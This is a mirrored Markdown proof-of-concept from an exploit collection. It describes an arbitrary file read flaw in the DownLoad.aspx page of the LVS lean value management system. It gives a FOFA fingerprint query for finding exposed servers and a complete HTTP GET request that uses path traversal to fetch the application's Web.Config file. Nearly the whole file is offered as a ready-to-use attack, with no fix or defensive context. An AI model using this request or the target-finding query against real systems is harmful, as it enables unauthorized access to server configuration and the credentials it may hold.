mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-08-12 19:16:12 +00:00
25 lines
486 B
Markdown
25 lines
486 B
Markdown
![]() |
## LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞
|
||
|
|
||
|
|
||
|
|
||
|
## fofa
|
||
|
|
||
|
```
|
||
|
body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
|
||
|
```
|
||
|
|
||
|
|
||
|
|
||
|
## poc
|
||
|
|
||
|
```
|
||
|
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
|
||
|
Host:
|
||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
Accept-Encoding: gzip, deflate
|
||
|
Accept: */*
|
||
|
Connection: keep-alive
|
||
|
```
|
||
|
|